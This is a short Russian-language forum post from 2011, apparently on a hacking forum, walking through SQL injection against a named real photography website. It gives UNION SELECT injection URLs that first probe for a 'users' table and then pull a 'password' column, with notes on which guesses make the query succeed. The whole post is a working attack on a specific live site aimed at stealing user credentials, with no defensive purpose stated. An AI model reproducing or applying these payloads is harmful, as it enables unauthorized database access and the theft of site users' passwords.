07.06.2011, 21:26
|
|
Новичок
Регистрация: 17.11.2008
Сообщений: 6
С нами:
9200604
Репутация:
0
|
|
Таким образом подбираем существующую таблицу:
Сообщение от None
http://www.photoindustria.ru/?mod=contest&id=14+union+select+null,null,null,nul l,null,null+from+ABCDEF
Если ABCDEF заменить на USERS - запроспроходит.
Далее подбираем поля:
Сообщение от None
http://www.photoindustria.ru/?mod=contest&id=14+union+select+users.pass,null,nu ll,null,null,null+from+users
Если вместо pass написать password - запрос проходит. |
|
|